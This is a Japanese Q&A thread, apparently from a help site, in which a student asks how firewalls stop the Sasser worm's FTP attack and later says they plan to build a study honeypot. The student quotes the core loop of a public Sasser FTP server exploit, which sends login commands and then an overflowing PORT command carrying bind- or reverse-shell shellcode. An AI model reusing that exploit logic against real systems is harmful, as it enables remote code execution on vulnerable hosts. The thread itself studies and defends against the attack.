No.1ベストアンサー
- 回答日時:
質問の条件がいまいちわかりませんが
コネクションが確立し通信が始まっている場合、通信の途中でFWによる通信切断は無いと思います。(タイムアウトや他の通信のエラーを除く)
何らかの理由でセッションが切れた場合はコネクションを作成しなければなりませんが、そもそも何故FWが通信を切断するか調査する方が先でしょう。
ところでこれは現実に起こっている問題ではなく、想定の問題(課題等)でしょうか?
この回答への補足
質問の文がわかりにくくてすみません.
今回質問をさせていただいたのは,Sasser のexploit(下記参照)を見ていて疑問に思うところがあったからです.
私が読んだ限り Sasser は攻撃するために以下の手順(1)~(3)を必要としていると思うのですが,ファイアウォールや侵入検知システムといった割と一般的な防御策ではどのように通信を切断しているのか知りたいのです.(1)の段階で通信するのをやめてしまうのでしょうか.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Sasser 攻撃手順
(1)まず'USER x'を送り,
(2)次に'PASS x'を送り,
(3)最後にバッファオーバフローを起こす
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Sasser Exploit
(www.frsirt.com/exploits/05102004.sasserftpd.c.php より引用)
// -------------------- core
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0) {
if (pid) kill(pid,SIGKILL);
fatal("[-] connect()");
}
printf("[+] connected, sending exploit\n");
buff=(char *)malloc(4096);
bzero(buff,4096);
sprintf(buff,"USER x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
sprintf(buff,"PASS x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
memset(buff+0000,0x90,2000);
strncpy(buff,"PORT ",5);
strcat(buff,"\x0a");
memcpy(buff+272,jmp[0],2);
memcpy(buff+276,&targets[type].goreg,4);
memcpy(buff+280,jmp[1],5);
setoff(targets[type].gpa, targets[type].lla);
if (bindopt)
memcpy(buff+300,&bsh,strlen(bsh));
else
memcpy(buff+300,&rsh,strlen(rsh));
send(s,buff,strlen(buff),0);
free(buff);
close(s);
// -------------------- end of core
No.3
- 回答日時:
No2 ency です。
ハニーポットですか。。。
0x90さんは、どのような環境を使おうとしていますか?
まさか、ご自分が現在お使いの環境をそのまま使おうとは思っていませんよね?
ハニーポットは、わざと脆弱性をさらしてウイルスやワームに感染させて、活動に一部始終をチェックするためのものです。
そのため、その後は、その環境自体最悪使い物にならなくなることも考慮する必要があります。
0x90さんに示していただいた URL も見ましたが、以下の一文にお気づきですか?
「■ ご注意 ■」の2項目
| あくまで遊びのレベルで作っています。細かい所は全く実装していませんので、
| 使い方によっては不具合が出る可能性があります。実用に用いるのは自殺行為
| です。現に作者はこの鯖を攻撃する方法をいくつか知っています。
このページの作成者さんも「実用に用いるのは自殺行為」とはっきりおっしゃっています。
もし、どうしても試してみたいというのであれば、参考URL に示したページに「ハニーポットの構築例」という箇所がありますので、そちらをご参考ください。
興味があるのはよくわかりますが、素人が下手に手を出せるものではありません。
以上、ご参考まで。。。
参考URL:http://www.atmarkit.co.jp/fsecurity/special/13ho …
encyさん,ご忠告ありがとうございます.
>まさか、ご自分が現在お使いの環境をそのまま使おうとは思っていませんよね?
不正アクセスと通信を行うにあたっては,大学の研究室に企業からお招きしている
専門家の方がいらっしゃるということなので,その方の指導の下で行います.
なので,よほどのことがない限り外部にご迷惑をおかけすることはありません.ご安心ください.
>興味があるのはよくわかりますが、素人が下手に手を出せるものではありません。
素人といわれないように春休みはネットワークプログラミングなどをしっかり勉強します.
温かく見守ってください.
No.2
- 回答日時:
[No1 yakkiidaさんの回答への補足より]
--------------------------------------------------------
今回質問をさせていただいたのは,Sasser のexploit(下記参照)を見ていて疑問に思うところがあったからです.
私が読んだ限り Sasser は攻撃するために以下の手順(1)~(3)を必要としていると思うのですが,ファイアウォールや侵入検知システムといった割と一般的な防御策ではどのように通信を切断しているのか知りたいのです.(1)の段階で通信するのをやめてしまうのでしょうか.
--------------------------------------------------------
sasser については、「ファイアウォールでポート455をブロックしろ」ということが対策として挙げられていただけで、通信中のコネクションを途中でぶった切るというものではなかったはず。
# 当時の記事が ITmedia にありましたので、参考URL に載せておきます。
つまり、「ポート455に対して TCP SYN が飛んできても、TCP SYN/ACK は返さないようにしておけ!」ということです。
TCP SYN/ACK を返してしまった場合、あとはバッファオーバフローによって、好き勝手なコードが実行されてしまう…と、そういうわけです。
言い換えれば「途中で通信を切断する」のではなくて、「そもそも通信させない」ことなんです。
こんなので、回答になっていますか?
参考URL:http://www.itmedia.co.jp/news/articles/0405/03/n …
この回答への補足
回答にはなっていませんが,Sasserの動作は参考URLに載っていた記事でよくわかりました.ありがとうございます.
そもそも通信をさせなければシステムがやられたりしなくていいというのはわかるのですが,私は不正アクセスの解析みたいなことに興味があるので,春休みにはネットワークプログラミングの勉強を兼ねて,自作ハニーポットのようなものを作りたいと考えています.ハニーポットとは不正アクセスと通信をやりとりして,どんな攻撃がきたのか調べるためのものです(たぶん).
なお,ハニーポット作成にあたって,ケロりんさんという方のサンプルを参考にしようかと考えています.
ttp://www.geocities.co.jp/SiliconValley-Cupertino/5128/500_compu/honeypot.html
不正アクセスには,前触れもなく攻撃をはじめるタイプもありますが,システムに深刻な侵害を与える攻撃を行う前に通信を必要とするタイプ(例えばSasser)もあるので,通信を必要とするタイプの攻撃にどう応答すればいいのかということについて勉強中です.
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
関連するカテゴリからQ&Aを探す
おすすめ情報
- ・漫画をレンタルでお得に読める!
- ・14歳の自分に衝撃の事実を告げてください
- ・架空の映画のネタバレレビュー
- ・「お昼の放送」の思い出
- ・昨日見た夢を教えて下さい
- ・ちょっと先の未来クイズ第4問
- ・【大喜利】【投稿~10/21(月)】買ったばかりの自転車を分解してひと言
- ・メモのコツを教えてください!
- ・CDの保有枚数を教えてください
- ・ホテルを選ぶとき、これだけは譲れない条件TOP3は?
- ・家・車以外で、人生で一番奮発した買い物
- ・人生最悪の忘れ物
- ・【コナン30周年】嘘でしょ!?と思った○○周年を教えて【ハルヒ20周年】
- ・ハマっている「お菓子」を教えて!
- ・最近、いつ泣きましたか?
- ・夏が終わったと感じる瞬間って、どんな時?
- ・10秒目をつむったら…
- ・人生のプチ美学を教えてください!!
- ・あなたの習慣について教えてください!!
- ・牛、豚、鶏、どれか一つ食べられなくなるとしたら?
- ・都道府県穴埋めゲーム
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
有線LAN のセキュリティについて
-
Microsoft Edgeでページが開け...
-
discordで、ミュートが勝手に解...
-
マインクラフト ポート開放につ...
-
家庭内LANの特定端末へアクセス...
-
iiyama ProLite XUB2390HSの起...
-
Webゆうパックプリントとプリン...
-
Googleの広告
-
URLが開けずホームページが見る...
-
ssl証明書のサイズとは何を見れ...
-
これのどこが削除対象になるの...
-
特定のサイトが開けません
-
httpをhttpsにしたい
-
バツがない漫画広告を簡単に消...
-
WebサイトのHTMLオブジェクトの...
-
トイレのコンセントにアースが...
-
インストールしようとしている...
-
httpd IPアドレスによるアクセ...
-
ウェブページへのアクセス不可 ...
-
サイトの作成について質問です!
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
数字での五十音のあらわし方
-
5g net for data と5g net の違...
-
GALAXY A41は5G通信は出来ない...
-
いま、通信関係の仕事をしてい...
-
スマホのわからないこと
-
通信における「ページング」っ...
-
DellのワイヤレスマウスはDell...
-
ローミングアシスタントは、入...
-
スマートウォッチつかえますか?
-
国内キャリアのGalaxyA41ってな...
-
オススメⅰアプリゲーム
-
BraveとOpera miniではどちらが...
-
Androidスマホなんですが買った...
-
Wi-Fiに接続すると、アプリのDL...
-
アンドロイド Chrome PC版サイ...
-
こんにちは~。嫌な過去を思い...
-
au利用者の方に質問です。 KDDI...
-
グループポリシーでIE閲覧制限...
-
Twitch iPhone XやiPhone7では1...
-
SKYPEにログインすると不正な通...
おすすめ情報